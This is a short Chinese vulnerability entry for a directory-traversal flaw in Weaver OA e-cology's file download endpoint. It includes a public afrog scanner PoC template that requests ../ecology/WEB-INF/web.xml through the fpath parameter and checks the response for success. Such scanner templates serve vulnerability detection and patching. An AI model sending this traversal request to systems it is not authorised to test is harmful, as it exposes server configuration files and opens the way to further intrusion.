e-cology-filedownload-directory-traversal: 泛微OA e-cology 文件下载目录遍历

日期: 2025-09-01 | 影响软件: 泛微OA e-cology | POC: 已公开

漏洞描述

泛微OA e-cology 文件下载目录遍历 app="Weaver-OA"

PoC代码[已公开]

id: e-cology-filedownload-directory-traversal

info:
  name: 泛微OA e-cology 文件下载目录遍历
  author: l1nk3r
  severity: critical
  description: 泛微OA e-cology 文件下载目录遍历 app="Weaver-OA"
  reference:
    - https://www.weaver.com.cn/cs/securityDownload.asp

rules:
    r0:
        request:
            method: GET
            path: /weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xml
        expression: response.status == 200 && response.body.bcontains(b"<url-pattern>/weaver/")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/e-cology-filedownload-directory-traversal.yaml

相关漏洞推荐